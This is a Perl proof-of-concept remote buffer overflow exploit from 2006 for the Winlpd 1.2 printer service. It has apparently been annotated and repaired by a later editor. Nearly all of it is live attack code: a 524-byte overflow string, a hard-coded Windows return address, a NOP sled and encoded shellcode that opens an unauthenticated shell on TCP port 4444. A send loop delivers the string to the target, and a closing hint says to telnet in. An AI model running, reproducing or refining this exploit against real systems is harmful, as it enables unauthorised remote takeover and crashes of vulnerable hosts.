
# Title : Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit
# Published : 2006-07-15
# Author : Pablo Isola


#!/usr/bin/perl

####################################################
#
# A proof of concept Remote Buffer Overflow Exploit
#
# App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com
#
# Possible problems on Windows XP: if the exploit doesn't
# work correctly, try another number in var 'loop'.
#
# Filler before the return address: 524 bytes.
#
# Author: Pablo Isola - neuquencapital@hotmail.com
#
# Neuquen - Patagonia Argentina.
#
# To my friend 'Esteban T.' and all of my friends...
# you know who you are.
#
# Bug Discussion: http://foro.elhacker.net/index.php/topic,131756.htm
####################################################

use Getopt::Std;
use Socket;
my $SOCKET = "";   # unused: nothing in this script reads $SOCKET

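# Attack parameters.  The host is required; port and attempt count may be
# overridden on the command line (defaults are the original values):
#
#   winlpd_exp.pl <host> [port=515] [loop=51]
#
# The listing this was recovered from had its backslashes stripped
# ("n" printed where "\n" belongs); the escapes are restored here.
my $host = $ARGV[0];
my $port = defined $ARGV[1] ? $ARGV[1] : 515;   # LPD (printer) service port
# Number of connection attempts.  Header notes: 51 for Windows 2000,
# 100-120 for Windows XP.  The send loop runs while $j < $loop, so this is
# one more than the number of strings actually sent.
my $loop = defined $ARGV[2] ? $ARGV[2] : 51;

# Reject a missing host or a non-numeric port/loop before touching the network.
if (!defined $host || $port !~ /\A\d+\z/ || $loop !~ /\A\d+\z/) {
	print "Error in Params.\n";
	print "Usage: winlpd_exp.pl [host] [port=515] [loop=51]\n";
	print "Open remote shell on port 4444\n";
	exit;
}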


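# Banner.  Two fixes against the recovered listing: the "\n" escapes were
# stripped, and an unescaped "@hotmail" inside a double-quoted string
# interpolates the (empty) array @hotmail, so the address printed as
# "neuquencapital.com".  The "@" is now escaped.
print "\nA Remote Buffer Overflow Exploit\n" .
      "Coded by Pablo Isola - neuquencapital\@hotmail.com\nNeuquen - Patagonia Argentina\n\n";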


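# Payload, 399 bytes.  Bytes copied verbatim from the listing with the
# stripped "\x" escapes restored (as printed, the script would have sent
# the ASCII text "xd9xee..." rather than the bytes).
# The opening bytes look like an fnstenv-based GetPC stub followed by a
# dword XOR decoder loop (ecx = 0x5e), i.e. an encoded stage -- consistent
# with a Metasploit-style encoder, but NOTE(review): the decoded payload was
# not verified here.  Per the usage text it opens a shell listener on
# TCP/4444.
my $sc  = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66";
$sc .= "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6";
$sc .= "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa";
$sc .= "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f";
$sc .= "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb";
$sc .= "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba";
$sc .= "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb";
$sc .= "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc";
$sc .= "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61";
$sc .= "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70";
$sc .= "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44";
$sc .= "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7";
$sc .= "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69";
$sc .= "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9";
$sc .= "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0";
$sc .= "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3";
$sc .= "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7";
$sc .= "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0";
$sc .= "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67";
$sc .= "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1";
$sc .= "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0";
$sc .= "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88";
$sc .= "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d";
$sc .= "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95";
$sc .= "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";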

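# Overwrite value placed after the 524-byte filler (presumably the saved
# return address, per the author's naming).  It is hard-coded per build
# and locale, so on any other target the service just crashes (denial of
# service) rather than running the payload:
#   0x77817477  Windows 2000 Professional 5.0.2195 SP4 Spanish  (used)
#   0x77A12553  Windows XP Professional 5.1.2600 SP1 Spanish
# The recovered listing had its "\x" escapes stripped; restored here, and
# the address is now built with pack('V') so the value above is used
# directly instead of a hand-reversed byte string.
my $ret_addr = 0x77817477;
my $ret = pack('V', $ret_addr);   # little-endian: "\x77\x74\x81\x77"
my $nop = "\x90" x 16;            # small NOP sled ahead of the shellcode
# Layout: 524 x 'A' | return address | 16 NOPs | shellcode
my $str = ("\x41" x 524) . $ret . $nop . $sc;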

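# Resolve the target and build the TCP endpoint once; the attempt loop
# reconnects for every send.  inet_aton() also resolves hostnames, so a
# DNS failure surfaces here as "Unknown host".
# Fixes: the sockaddr_in() failure message wrongly blamed getprotobyname()
# and quoted $!, which that call does not set; the stripped "\n" escapes
# are restored.
my $iaddr = inet_aton($host)           or die "Unknown host: $host\n";
my $paddr = sockaddr_in($port, $iaddr) or die "sockaddr_in failed for $host:$port\n";
my $proto = getprotobyname('tcp')      or die "getprotobyname: $!\n";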

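# Attempt loop: one fresh TCP connection per iteration, send the whole
# overflow string, pause, disconnect.  Runs $loop-1 times (1 .. $loop-1),
# exactly as the original did -- the per-OS counts in the header assume
# that.  A connect() failure aborts the run; once the service has crashed
# or been taken over, that is the expected way out.
# Fixes: send() only reported undef, so a short write would have truncated
# the payload silently; the byte count is now checked.  A lexical handle
# replaces the bareword SOCKET and the stripped "\n" escapes are restored.
for (my $attempt = 1; $attempt < $loop; $attempt++) {
	socket(my $sock, PF_INET, SOCK_STREAM, $proto) or die "socket: $!\n";
	connect($sock, $paddr) or die "Lost Conection: $! .........ay Carumba?\n";
	my $sent = send($sock, $str, 0);
	die "failure sent: $!\n" unless defined $sent;
	die "short send: $sent of " . length($str) . " bytes\n" if $sent != length($str);
	print "\nSending string: " . $attempt;
	#	print "\nview:\n" . $str . "\n";   # debug: dump the payload
	sleep(1);   # give the service a moment before tearing the connection down
	close $sock;
	sleep(1);   # and before the next connection
}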

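# Closing hint (stripped "\n" escapes restored).  The payload's listener on
# TCP/4444 is reached with a bare telnet, i.e. presumably unauthenticated:
# anyone who can reach the host can take the shell, so do not leave it up.
print "\n\nTry: telnet remote_ip 4444\n\n" .
      "To my friend 'Esteban T.' and to all of my friends...you know who you are.\n" .
      "Have a nice day :)\n\n";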
